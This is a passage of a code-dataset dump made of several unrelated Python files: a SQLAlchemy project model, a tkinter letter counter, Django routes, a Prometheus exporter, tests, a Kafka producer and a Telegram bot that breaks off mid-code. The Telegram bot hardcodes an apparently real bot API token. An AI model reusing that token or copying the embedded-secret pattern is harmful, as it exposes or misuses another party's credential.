JSONB,\n default=DEFAULT_DELIVERY_CONFIG,\n info={\n 'colanderalchemy': {\n 'title': 'Delivery information for this project.',\n 'missing': colander.drop,\n 'typ': schema.JSONType\n }\n }\n )\n \"\"\"Delivery configuration for orders in this project.\n\n It stores a dictionary of configurations to be used by the delivery mechanism.\n\n i.e::\n\n {\n \"approve\": {\n \"archive\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": true,\n \"images\": true,\n \"other\": true,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n },\n \"gdrive\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": false,\n \"images\": true,\n \"other\": false,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n },\n },\n \"accept\": {\n \"sftp\": {\n \"driver\": \"sftp\",\n \"subfolders\": false,\n \"images\": true,\n \"other\": false,\n \"name\": \"order.customer_order_id\",\n \"resize\": [\n {\"name\": \"resized\", \"filter\": \"maxbytes\": 4000000}\n ]\n }\n }\n }\n\n \"\"\"\n\n cancellation_window = sa.Column(sa.Integer, default=1)\n \"\"\"Period, in hours, before the shooting, an Assignment can be cancelled.\n\n i.e.: 24 would mean an Assignment in this project could be cancelled with\n at least 24 hour notice. 
Zero means no cancellation is possible.\n    \"\"\"\n\n    availability_window = sa.Column(sa.Integer, default=6)\n    \"\"\"Period, in days, within which an availability date can be entered.\n\n    i.e.: 6 would mean an Order would have availability dates for at least 6 days in the future.\n    Zero means no check is done.\n    \"\"\"\n\n    approval_window = sa.Column(sa.Integer, default=5)\n    \"\"\"Period (business days) after the delivery in which an Order will be automatically accepted.\n\n    If an Order is delivered and not rejected by the customer, it will be automatically accepted by a task.\n    i.e.: 10 would mean an Order in this project could be approved up to 10 days after its delivery.\n    Zero means an Order will be automatically approved.\n    \"\"\"\n\n    add_order_roles = sa.Column(\n        JSONB,\n        default=DEFAULT_ADD_ORDER_ROLES,\n        info={\n            'colanderalchemy': {\n                'title': 'Roles allowed to add an order.',\n                'missing': colander.drop,\n                'typ': schema.List()\n            }\n        }\n    )\n    \"\"\"Roles allowed to add orders on this project.\n\n    Options come from :mod:`briefy.common.vocabularies.roles.Groups`.\n    \"\"\"\n\n    @orm.validates('add_order_roles')\n    def validate_add_order_roles(self, key, value):\n        \"\"\"Validate if values for add_order_roles are correct.\"\"\"\n        all_groups = [item.value for item in Groups]\n        for item in value:\n            if item not in all_groups:\n                raise ValidationError(message='Invalid role', name=key)\n        return value\n\n    @property\n    def settings(self) -> Objectify:\n        \"\"\"Project settings.\n\n        Aggregate settings information about a project.\n        :return: Dictionary with all settings for a project.\n        \"\"\"\n        # TODO: These settings are in a transitional state while\n        # we move other configuration-related fields here.\n        # To preserve backwards compatibility, we simply proxy those\n        # fields - but their use should be deprecated as soon as possible.\n\n        # (NB. Even with Objectify, there is no provision\n        # for writing back any of the \"dates\" subfields yet)\n\n        return Objectify({\n            'tech_requirements': self.tech_requirements,\n            'delivery_config': self.delivery,\n            'dates': {\n                'cancellation_window': self.cancellation_window,\n                'availability_window': self.availability_window,\n                'approval_window': self.approval_window,\n            },\n            'permissions': {\n                'add_order': self.add_order_roles\n            },\n            'order_type': self.order_type,\n            'project_type': self.project_type\n        })\n\n    @settings.setter\n    def settings(self, value: t.Union[Objectify, t.Mapping]):\n        \"\"\"Project settings.\n\n        Set all settings for a project.\n        :value: Dictionary with all settings for a project.\n        \"\"\"\n        # 'PUT' semantics setter. 
This will destroy everything on the way.\n # to change a single sub-field, consider changing the just the desired\n # entry along with a call to\n # sqlalchemy.orm.attributes.flag_modified(obj, data_field_name)\n # (check the correct underlying field_name on the settings.getter\n # above while we are in this transitional stage)\n\n value = Objectify(value, sentinel=None)\n self.tech_requirements = value.tech_requirements or {}\n self.delivery = value.delivery_config or {}\n self.add_order_roles = value.permissions.add_order or []\n self.cancellation_window = value.dates.cancellation_window or 0\n self.availability_window = value.dates.availability_window or 0\n self.approval_window = value.dates.approval_window or 0\n\n orders = orm.relationship(\n 'Order',\n foreign_keys='Order.project_id',\n primaryjoin=\"\"\"and_(\n Order.current_type=='order',\n foreign(Order.project_id)==Project.id,\n )\"\"\",\n lazy='dynamic'\n )\n \"\"\"List of Orders of this project.\n\n Returns a collection of :class:`briefy.leica.models.job.order.Order`.\n \"\"\"\n\n leadorders = orm.relationship(\n 'LeadOrder',\n foreign_keys='LeadOrder.project_id',\n primaryjoin=\"\"\"and_(\n LeadOrder.current_type=='leadorder',\n foreign(LeadOrder.project_id)==Project.id,\n )\"\"\",\n lazy='dynamic'\n )\n \"\"\"List of LeadOrders of this project.\n\n Returns a collection of :class:`briefy.leica.models.job.leadorder.LeadOrder`.\n \"\"\"\n\n @hybrid_property\n def total_orders(self) -> int:\n \"\"\"Return the Project total number of orders.\"\"\"\n return self.orders.count()\n\n @total_orders.expression\n def total_orders(cls) -> int:\n \"\"\"Return the Project total number of orders.\"\"\"\n return sa.func.count(cls.orders)\n\n @hybrid_property\n def total_leadorders(self) -> sa.sql.func:\n \"\"\"Return the Project total number of leadorders.\"\"\"\n return self.leadorders.count()\n\n @total_leadorders.expression\n def total_leadorders(cls) -> sa.sql.func:\n \"\"\"Return the Project total number of leadorders.\"\"\"\n return sa.func.count(cls.leadorders)\n\n # Formerly known as brief\n briefing = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Briefing link',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to briefing file regarding this Project.\"\"\"\n\n release_template = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Release template',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to release template file.\"\"\"\n\n pool_id = sa.Column(\n sautils.UUIDType,\n sa.ForeignKey('pools.id'),\n index=True,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Pool ID',\n 'validator': colander.uuid,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Pool ID.\n\n Relationship between a project and a Pool.\n \"\"\"\n\n @sautils.observes('customer_id')\n def _customer_id_observer(self, customer_id):\n \"\"\"Update path when customer id changes.\"\"\"\n if customer_id:\n customer = Item.get(customer_id)\n self.path = customer.path + [self.id]\n\n @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n def to_summary_dict(self) -> dict:\n \"\"\"Return a summarized version of the dict representation of this Class.\n\n Used to serialize this object within a parent object serialization.\n :returns: Dictionary with fields and values used by this Class\n \"\"\"\n data = super().to_summary_dict()\n 
return data\n\n    @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n    def to_listing_dict(self) -> dict:\n        \"\"\"Return a summarized version of the dict representation of this Class.\n\n        Used to serialize this object within a parent object serialization.\n        :returns: Dictionary with fields and values used by this Class\n        \"\"\"\n        data = super().to_listing_dict()\n        data = self._apply_actors_info(data)\n        return data\n\n    @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n    def to_dict(self, excludes: list=None, includes: list=None):\n        \"\"\"Return a dict representation of this object.\"\"\"\n        data = super().to_dict(excludes=excludes, includes=includes)\n        data['settings'] = self.settings._get()\n        if includes and 'state_history' in includes:\n            # Workflow history\n            add_user_info_to_state_history(self.state_history)\n        # Apply actor information to data\n        data = self._apply_actors_info(data)\n        return data\n\n\n@event.listens_for(Project, 'after_update')\ndef project_after_update(mapper, connection, target):\n    \"\"\"Invalidate Project cache after instance update.\"\"\"\n    project = target\n    cache_region.invalidate(project)\n","repo_name":"BriefyHQ/briefy.leica","sub_path":"src/briefy/leica/models/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"36161590308","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\n# from tkinter.filedialog import asksaveasfilename\n\n\nclass countLetters_solution:\n    \"\"\"\n    Count how many times each letter appears\n    \"\"\"\n    def __init__(self):\n        window = Tk()\n        frame1 = Frame(window)\n        frame1.grid()\n\n        scrollbar = Scrollbar(frame1)\n        scrollbar.pack(side = RIGHT, fill = Y)\n        self.text = Text(frame1, width = 50, height = 20,\n                         wrap = WORD, yscrollcommand = scrollbar.set)\n        self.text.pack()\n        scrollbar.config(command = self.text.yview)\n\n        frame2 = Frame(window)\n        frame2.grid()\n        Label(frame2, text = \"Enter a filename: \").grid(row = 1, column = 1)\n        self.textInfo = StringVar()\n        Entry(frame2, textvariable = self.textInfo, width = 20).grid(row = 1, column = 2)\n        Button(frame2, text = \"Browse\", command = self.browse_file).grid(row = 1, column = 3)\n        Button(frame2, text = \"Show Result\", command = self.show_result).grid(row = 1, column = 4)\n\n        window.mainloop()\n\n    def browse_file(self):\n        filenameforReading = askopenfilename()\n        infile = open(filenameforReading, \"r\")\n        self.allInfoDict = self.get_info_to_file(infile)\n        infile.close()\n\n    def get_info_to_file(self, infile):\n        # count the number of times each letter appears in infile\n        # and format it nicely\n        allInfoDict = {}  # create a dict\n        eachLetter = infile.read(1)\n        while eachLetter != '':\n            if eachLetter.isalpha():\n                if eachLetter not in allInfoDict:\n                    allInfoDict[eachLetter] = 1\n                else:\n                    allInfoDict[eachLetter] += 1\n            eachLetter = infile.read(1)\n\n        return allInfoDict  # Return a dict mapping each letter to its appearance count\n\n    def show_result(self):\n        try:\n            if self.textInfo.get().strip() != '':  # ignore whitespace-only input\n                fileRutine = self.textInfo.get()\n                infile = open(fileRutine, \"r\")\n                self.allInfoDict = self.get_info_to_file(infile)\n                infile.close()\n        except (IOError, FileNotFoundError):\n            print(\"Input is wrong, please try again\")\n        finally:\n            for key in self.allInfoDict:\n                if self.allInfoDict[key] < 2:\n                    self.text.insert(END, \"{} appears {} time\\\n\".format(key, self.allInfoDict[key]))\n                else:\n                    
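# --- Editor's note: hedged usage sketch for the Project.settings proxy defined in
# the record above. It relies only on the Objectify behaviour the record itself
# demonstrates (attribute access over nested dicts); `project` stands for any
# loaded Project row and is a hypothetical argument.
def can_customers_add_orders(project):
    """True if the g:customers group may add orders on this project (sketch)."""
    return 'g:customers' in (project.settings.permissions.add_order or [])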
self.text.insert(END, \"{} appears {} times\\n\".format(key, self.allInfoDict[key]))\n\n self.allInfoDict.clear() # clear information after showed\n\nif __name__ == '__main__':\n countLetters_solution()\n","repo_name":"romanticair/python","sub_path":"basis/tkinter-demo/tk_check_times_of_letter_appear_1.py","file_name":"tk_check_times_of_letter_appear_1.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22435956770","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom checkin_app.views import UserCreateView, IndexView, ChildCreateView, \\\n ChildDetailView, TimeCreateView, EmployeeListView, \\\n TimeUpdateView, SchoolDetailView, ProfileUpdateView, \\\n CheckinSuccessView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('django.contrib.auth.urls'), name='login'),\n url(r'^create_user/$', UserCreateView.as_view(), name='user_create_view'),\n url(r'^accounts/profile/$', ProfileUpdateView.as_view(), name='profile_view'),\n url(r'^$', IndexView.as_view(), name='index_view'),\n url(r'^child/create/$', ChildCreateView.as_view(), name='child_create_view'),\n url(r'^child/(?P\\d+)/$', ChildDetailView.as_view(), name='child_detail_view'),\n url(r'^employee/$', EmployeeListView.as_view(), name='employee_list_view'),\n url(r'^school/$', SchoolDetailView.as_view(), name='school_detail_view'),\n url(r'^child/(?P\\d+)/create/$', TimeCreateView.as_view(), name='time_create_view'),\n url(r'^child/(?P\\d+)/update/$', TimeUpdateView.as_view(), name='time_update_view'),\n url(r'^child/(?P\\d+)/success/$', CheckinSuccessView.as_view(), name='checkin_success_view'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"rallen0150/child_checkin","sub_path":"checkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40861001394","text":"import socket\nfrom ipaddress import ip_address\nfrom http.server import HTTPServer,BaseHTTPRequestHandler\n\nclass Metrics(HTTPServer): \n def __init__(self, address, collectors):\n if ip_address(address[0]).version == 6: \n self.address_family = socket.AF_INET6\n self.collectors = collectors \n super().__init__(address, self.RequestHandler)\n\n class RequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path != \"/metrics\":\n return self.send_error(404)\n\n metrics = []\n for collector in self.server.collectors:\n for metric in collector.get_metrics():\n metrics.append(metric.format_prom())\n\n output = '\\n'.join(metrics) + '\\n'\n self.send_response(200)\n self.end_headers()\n self.wfile.write(output.encode())\n","repo_name":"w1kl4s/yatrex","sub_path":"src/PrometheusServer.py","file_name":"PrometheusServer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660364479","text":"import pytest,yaml,allure,os\nfrom page.app import App\n\n@allure.feature(\"搜索\")\nclass Testsearch:\n @pytest.mark.parametrize(\"key,price\",yaml.safe_load(open('D:\\\\pythonCoding\\\\pythonProject\\\\xueqiuAutoTeat\\\\TestCase\\\\search.yml')))\n @allure.story(\"搜索股价\")\n def test_search(self,key,price):\n with allure.step(\"首页点击搜索,进入搜索页面,输入关键词搜索,并断言\"):\n assert 
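# --- Editor's note: hedged usage sketch for the Metrics server in the record
# above. The collector interface (get_metrics() yielding objects that implement
# format_prom()) is inferred from the request handler and is an assumption.
class StaticMetric:
    def format_prom(self):
        return 'yatrex_up 1'

class StaticCollector:
    def get_metrics(self):
        return [StaticMetric()]

server = Metrics(('127.0.0.1', 9100), [StaticCollector()])
server.serve_forever()   # GET http://127.0.0.1:9100/metrics now returns "yatrex_up 1"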
App().start().main().goto_search_page().searchinput(key).get_price()>float(price)\n @allure.story(\"点击头像进入我的页面\")\n def test_photo001(self):\n App().start().main().goto_my_photo()\n\n# if __name__ == '__main__':\n#\n# pytest.main(['./case/test_search.py','-sv','--alluredir',\"../Testroport/report\"])\n# os.system(f\"allure generate ../Testroport/report -o ../Testroport/report --clean\")\n","repo_name":"Jinghua123456/yueying","sub_path":"pythonProject/xueqiuAutoTeat/case/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26174351899","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\n\n\ndef find_mcps(tree):\n s = -1\n t = -2\n R, S = nx.bipartite.sets(tree)\n flow_vertices = [s] + [t] + list(R) + list(S)\n flow_edges = []\n for i in R:\n for j in tree[i]:\n flow_edges.append((i, j))\n\n f = nx.DiGraph()\n f.add_nodes_from(flow_vertices)\n\n # Connect s to R, S to t, and add flow edges\n f.add_edges_from([(s, i) for i in R], capacity=2)\n f.add_edges_from([(j, t) for j in S], capacity=2)\n f.add_edges_from(flow_edges, capacity=1)\n\n flow_value, flow_dict = nx.maximum_flow(f, s, t)\n\n mcps = [(i, j) for (i, j) in flow_edges if flow_dict[i][j] == 0]\n return mcps\n\n\ndef main():\n with open(\"mcps_max_flow.txt\", \"w\") as file:\n file.write(f\"{datetime.datetime.now()}\\n\")\n file.write(f\"test, size, bmatching size, bmatching time\\n\")\n\n for tree_size in [10, 100, 1000, 10000]:\n for iteration in range(1000):\n tree = nx.random_tree(tree_size)\n\n st = time.time()\n bmatching_mcps = find_mcps(tree)\n bmatching_time = time.time() - st\n bmatching_size = len(bmatching_mcps)\n\n with open(\"mcps_max_flow.txt\", \"a\") as file:\n file.write(f\"{iteration+1}, {tree_size}, {bmatching_size}, {bmatching_time}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JacobRestanio/mcps","sub_path":"maxflow.py","file_name":"maxflow.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908610480","text":"#Shaaheen Sacoor SCRSHA001\r\n#19 April 2014\r\n#Program to enter a right aligned list of names\r\n\r\ndef main():\r\n list_string =[] # Empty list to add into later\r\n strings = input(\"Enter strings (end with DONE):\\n\")\r\n if strings == \"DONE\":\r\n print(\"\")\r\n print(\"Right-aligned list:\")\r\n else:\r\n while strings!=\"DONE\":\r\n list_string.append(strings) # Adds strings to list\r\n strings = input(\"\")\r\n \r\n print(\"\\nRight-aligned list:\")\r\n lengthlist=[]\r\n for i in range(len(list_string)): #To find longest word from the list for the aligning\r\n lengthlist.append(len(list_string[i]))\r\n lengthlist.sort()\r\n lengthlist.reverse()\r\n longest_length =lengthlist[0]\r\n rightalign = '{:>'\r\n rightalign += str(longest_length)\r\n rightalign += '}'\r\n for i in range(len(list_string)): #Goes through list \r\n print(rightalign.format(list_string[i]))\r\n \r\nmain()\r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/scrsha001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10251733580","text":"'''\nCreated on Nov 6, 2020\n\n@author: braistedjc\n'''\nfrom pprint import pprint\n\nclass 
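# --- Editor's note: hedged usage sketch for find_mcps in the maxflow record above.
# The construction caps every R-vertex at 2 units out and every S-vertex at 2 units
# in, so saturated edges form a maximum subgraph with degree <= 2 on both sides;
# the zero-flow edges are the ones reported. A star with three leaves must drop one:
import networkx as nx

star = nx.star_graph(3)        # center 0, leaves 1..3 -- a tree, hence bipartite
print(find_mcps(star))         # one center-leaf edge, e.g. [(0, 3)]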
loadResource(object):\n '''\n classdocs\n '''\n def __init__(self):\n self.loadStatus = \"\"\n self.destTable = \"\"\n self.loadType = \"\"\n self.stagingFile = \"\"\n self.primaryKey = \"\"\n self.columnNames = []\n \n def initFileResource(self, resource):\n self.loadStatus = resource.status\n self.stagingFile = resource.file\n self.loadType = resource.loadType\n self.destTable = resource.table\n self.primaryKey = resource.primaryKey\n self.columnNames = resource.colNames.split(\",\")\n \n def printResource(self):\n pprint(vars(self))\n\n","repo_name":"ncats/RaMP-BackEnd","sub_path":"src/rampConfig/loadConfig.py","file_name":"loadConfig.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"73720927479","text":"from django.contrib import admin\nfrom django.urls import path\nfrom products import views\n\nurlpatterns = [\n path('department/', views.ListDepartmentView.as_view(), name=\"department_list\"),\n path('department/create', views.CreateDepartmentView.as_view(), name=\"department_create\"),\n path('department//update', views.UpdateDepartmentView.as_view(), name=\"department_update\"),\n path('category/', views.ListCategoryView.as_view(), name=\"category_list\"),\n path('category/create', views.CreateCategoryView.as_view(), name = \"category_create\"),\n path('category//update', views.UpdateCategoryView.as_view(), name=\"category_update\"),\n path('products/', views.ListProductView.as_view(), name=\"products\"),\n path('products//', views.DetailProductView.as_view(), name=\"product_detail\"),\n path('products//update/', views.UpdateProductView.as_view(), name=\"product_update\"),\n path('products/create/', views.CreateProduct, name = \"product_create\"),\n]","repo_name":"Hernandes-Silva/virtual_store","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"31696983702","text":"import json\n\nfrom kafka import KafkaProducer\nfrom main import BROKER_URL\n\nproducer = KafkaProducer(bootstrap_servers=BROKER_URL)\n\n\npayload = {\n \"product_id\": 1,\n \"price\": {\n \"amount\": 10.99,\n \"currency\": \"PLN\",\n },\n}\nserialized = json.dumps(payload).encode()\n\n\nfuture = producer.send(\"products\", value=serialized)\nfuture.get(timeout=5)\n","repo_name":"Enforcer/micro-kafka","sub_path":"buying_process_manager/send_product_bought.py","file_name":"send_product_bought.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27841466036","text":"#!/usr/bin/env python\n\nimport common, unittest\nimport os, tempfile\n\nmod = common.load('network_access', common.TOOLS_DIR + '/scripts/clipboard/python/network_access.py')\n\nclass NetworkAccessTests(common.TestCase):\n def setUp(self):\n self.access = mod.NetAccess()\n\n '''\n Confirm that an address is allowed on a NetAccess instance with no loaded rules.\n '''\n def test_allow_simple(self):\n self.assertTrue(self.access.is_allowed('127.0.0.1'))\n\n '''\n Confirm that an address is allowed on account of not being a blacklisted address.\n '''\n def test_allow_blacklist(self):\n self.access.add_blacklist('10.0.0.1')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.1.1.1'))\n\n '''\n Confirm that an address is allowed on account of not being in a blacklisted 
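# --- Editor's note: hedged counterpart to the Kafka producer record above -- a
# consumer for the same "products" topic using kafka-python's KafkaConsumer. The
# broker address is an assumption standing in for the record's BROKER_URL.
import json
from kafka import KafkaConsumer

consumer = KafkaConsumer('products', bootstrap_servers='localhost:9092')
for message in consumer:
    payload = json.loads(message.value)
    print(payload['product_id'], payload['price']['amount'])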
network.\n '''\n def test_allow_blacklist_network(self):\n self.access.add_blacklist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('10.1.1.1'))\n\n '''\n Confirm that an address is allowed on account of being a whitelisted address.\n '''\n def test_allow_whitelist(self):\n self.access.add_whitelist('10.0.0.1')\n self.assertTrue(self.access.is_allowed('10.0.0.1'))\n\n '''\n Confirm that an address is allowed on account of being in a whitelisted network network.\n '''\n def test_allow_whitelist_network(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.254.254'))\n self.assertTrue(self.access.is_allowed('10.0.1.2'))\n\n '''\n Test block on account of a blacklisted address.\n '''\n def test_block_blacklist(self):\n\n addr = '127.0.0.1'\n\n self.access.add_blacklist(addr)\n self.assertFalse(self.access.is_allowed(addr))\n\n '''\n Test block on account of being in a blacklisted network.\n '''\n def test_block_blacklist_network(self):\n\n self.access.add_blacklist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('9.255.255.254')) # Lower address\n self.assertTrue(self.access.is_allowed('10.1.0.1')) # Higher address\n self.assertFalse(self.access.is_allowed('10.0.0.1')) # Start of range\n self.assertFalse(self.access.is_allowed('10.0.254.254')) # End of range\n\n '''\n Confirm that blacklisted address takes precedence over a whitelisted network.\n '''\n def test_block_blacklist_precedence_address(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.access.add_blacklist('10.0.0.1')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.0.2'))\n\n '''\n Confirm that blacklisted network takes precedence over a whitelisted network.\n '''\n def test_block_blacklist_precedence_network(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.access.add_blacklist('10.0.0.0/24')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.1.1'))\n\n '''\n Test block on account of not being a whitelisted address.\n '''\n def test_block_whitelist(self):\n\n self.access.add_whitelist('192.168.0.1')\n self.assertFalse(self.access.is_allowed('192.168.0.2'))\n\n '''\n Test block on account of not being within a whitelisted network.\n '''\n def test_block_whitelist_network(self):\n\n self.access.add_whitelist('192.168.0.0/24')\n self.assertFalse(self.access.is_allowed('192.168.1.1'))\n\n '''\n Test block on account of not being within a whitelisted network on a file with a lower address\n '''\n def test_block_whitelist_network_b(self):\n\n self.access.add_whitelist('192.168.1.0/24')\n self.assertFalse(self.access.is_allowed('192.168.0.255')) # Test an address below the whitelisted range\n self.assertFalse(self.access.is_allowed('192.168.2.0')) # Test an address above the whitelisted range\n\n '''\n Test behavior of loading a file containing blacklisted addresses.\n '''\n def test_file_blacklist_file(self):\n with tempfile.TemporaryDirectory() as src:\n path = os.path.join(src, 'access-file')\n with open(path, 'w') as f:\n f.write('192.168.0.1\\n')\n f.write('192.168.1.0/24\\n')\n\n self.access.load_blacklist_file(path)\n\n self.assertFalse(self.access.is_allowed('192.168.0.1')) # Test the manual unwanted address\n self.assertFalse(self.access.is_allowed('192.168.1.1')) # Test an unwanted address in the blacklisted CIDR range.\n self.assertTrue(self.access.is_allowed('192.168.0.2')) # Test a not-unwanted 
field\n\n '''\n Test behavior of loading a file containing whitelisted addresses.\n '''\n def test_file_whitelist_file(self):\n with tempfile.TemporaryDirectory() as src:\n path = os.path.join(src, 'access-file')\n with open(path, 'w') as f:\n f.write('192.168.0.1\\n')\n f.write('192.168.1.0/24\\n')\n\n self.access.load_whitelist_file(path)\n\n self.assertTrue(self.access.is_allowed('192.168.0.1')) # Test the manual address\n self.assertTrue(self.access.is_allowed('192.168.1.1')) # Test an address in the allowed CIDR range.\n self.assertFalse(self.access.is_allowed('192.168.0.2')) # Test an unwanted field\n\n '''\n Confirm various conversions of IPv4 addreses to a number.\n '''\n def test_ip_strton(self):\n\n tests = [\n ('255.255.255.254', 4294967294),\n ('192.168.0.1', 3232235521),\n ('10.0.0.1', 167772161),\n ('10.0.0.2', 167772162)\n ]\n for value_string, value_num in tests:\n self.assertEqual(value_num, self.access.ip_strton(value_string))\n","repo_name":"adeutscher/core-tools","sub_path":"scripts/test/tests.d/clipboard/python/network_access.py","file_name":"network_access.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"71697903480","text":"import telebot\nimport pyjokes\nfrom tabula import read_pdf\nfrom tabula import read_pdf_with_template\nfrom telebot import types\nimport json\nimport datetime\nimport pymysql as sq\n\n\nTOKEN = \"829593578:AAHlUspWbFlV287wEzXHAr3ZONjyp-EjCsQ\"\nbot = telebot.TeleBot(TOKEN)\n\nchat_ids = set()\n\nprint(\"\\n[+] Working........\")\n\n#help\n@bot.message_handler(commands=[\"help\"])\ndef help_command(message):\n # print(chat_ids)\n chat_ids.add(message.chat.id)\n bot.send_message(message.chat.id,\"List of Commands:\\n/start\\n/pun\\n/help\\n/schedule\\n\")\n\n\n#start\n@bot.message_handler(commands=[\"start\"])\ndef start_command(message):\n # print(\"received\")\n bot.send_message(message.chat.id,\"Greetings! Welcome.... \\nMyself Ervin. 
Created to serve as helping hand...\\nI can serve the purpose if my c0de doesn't crash xD....\\nUse /help for list of commands...\")\n\n\n#pun\n@bot.message_handler(commands=[\"pun\"])\ndef pun_command(message):\n bot.send_message(message.chat.id,pyjokes.get_joke())\n\n# pp = \"dcn\"\n#mon_r1\n@bot.message_handler(commands=[\"schedule\"])\ndef scheduler(message):\n markup = telebot.types.InlineKeyboardMarkup() # row_width=2\n itembtn2 = telebot.types.InlineKeyboardButton(\"ECE\", callback_data=\"2\")\n itembtn1 = telebot.types.InlineKeyboardButton(\"CSE\", callback_data=\"1\")\n itembtn3 = telebot.types.InlineKeyboardButton('EEE', callback_data=\"3\")\n itembtn4 = telebot.types.InlineKeyboardButton('CIVIL', callback_data=\"4\")\n itembtn5 = telebot.types.InlineKeyboardButton('MME', callback_data=\"5\")\n itembtn6 = telebot.types.InlineKeyboardButton('MINING', callback_data=\"6\")\n itembtn7 = telebot.types.InlineKeyboardButton('ARCHI', callback_data=\"7\")\n markup.add(itembtn1)\n markup.add(itembtn2, itembtn3)\n markup.add(itembtn4, itembtn5, itembtn6, itembtn7)\n # bot.send_message(message.chat.id, \"Select your Dept.\", reply_markup=markup)\n # markup = types.ReplyKeyboardRemove(selective=True)\n bot.send_message(message.chat.id, \"Select Dept....\", reply_markup=markup)\n # bot.send_message(message.chat.id,a)\n\n@bot.callback_query_handler(lambda call: call.data in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"])\ndef day_scheduler(call):\n markup = telebot.types.InlineKeyboardMarkup()#row_width=2\n weekday = datetime.datetime.today().weekday()\n dept = call.data\n yes = telebot.types.InlineKeyboardButton(\"YESTERDAY\",callback_data=str(weekday+1)+dept)\n tod = telebot.types.InlineKeyboardButton(\"TODAY\",callback_data=str(weekday+2)+dept)\n tom = telebot.types.InlineKeyboardButton(\"TOMORROW\",callback_data=str(weekday+3)+dept)\n mon = telebot.types.InlineKeyboardButton(\"MON\",callback_data=\"2\"+dept)\n tue = telebot.types.InlineKeyboardButton(\"TUE\",callback_data=\"3\"+dept)\n wed = telebot.types.InlineKeyboardButton('WED',callback_data=\"4\"+dept)\n thurs = telebot.types.InlineKeyboardButton('THURS',callback_data=\"5\"+dept)\n fri = telebot.types.InlineKeyboardButton('FRI',callback_data=\"6\"+dept)\n markup.add(yes,tod,tom)\n markup.add(mon,tue)\n markup.add(wed,thurs,fri)\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n bot.edit_message_text(\"Select day....\", cid, mid, reply_markup=markup)\n # bot.send_message(message.chat.id, \"Choose the day....\", reply_markup=markup)\n # bot.callback_query_handler(schedule_callback)\n\n# @bot.answer_callback_query(callback_query_id=ca)\n\n# @bot.callback_query_handler(lambda call: call.data in [2,3,4,5,6])\n@bot.callback_query_handler(lambda call: len(call.data) == 2) # in [\"2\",\"3\",\"4\",\"5\",\"6\"])\ndef schedule_callback(call):\n day = call.data\n print(day)\n # print(type(call.data))\n # print(call.data)\n markup = telebot.types.InlineKeyboardMarkup() # row_width=2\n r1 = telebot.types.InlineKeyboardButton(\"R1\", callback_data=\"1\"+day)\n r2 = telebot.types.InlineKeyboardButton(\"R2\", callback_data=\"2\"+day)\n r3 = 